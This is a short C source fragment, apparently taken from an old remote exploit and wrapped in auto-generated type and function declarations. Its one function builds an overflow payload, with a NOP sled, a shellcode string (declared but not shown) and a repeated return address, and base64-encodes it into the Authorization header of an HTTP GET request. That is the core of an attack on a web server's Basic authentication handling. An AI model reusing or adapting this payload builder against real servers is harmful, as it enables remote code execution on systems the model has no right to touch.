
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int EXP_SIZE ;
 char* encode_base64 (int,char*) ;
 int exit (int) ;
 scalar_t__ malloc (int) ;
 int memcpy (char*,unsigned long*,int) ;
 int memset (char*,int,int) ;
 int perror (char*) ;
 char* shellcode ;
 int sprintf (char*,char*,...) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;

void make_http_request(char *buff,int size,char *host,unsigned long *magic) {
 char *exp_buff;
 char *exp_buff_encoded;
 int i;
 if (!(exp_buff=(char*)malloc(EXP_SIZE))){
  perror("malloc()");
  exit(1);
 }

 memset(exp_buff,0x90,EXP_SIZE);
 strcpy(exp_buff+256-strlen(shellcode),shellcode);
 for(i=256;i<EXP_SIZE-5;i+=4)
  memcpy(exp_buff+i,magic,4);
 strcpy(exp_buff+EXP_SIZE-4,":x");
 exp_buff_encoded=encode_base64(EXP_SIZE,exp_buff);
 memset(buff,0x00,size);
 sprintf(buff,"GET / HTTP/1.0\r\n");
 sprintf(buff,"%sHost: %s\r\n",buff,host);
 sprintf(buff,"%sAuthorization: Basic %s\r\n\r\n\r\n",buff,exp_buff_encoded);

}
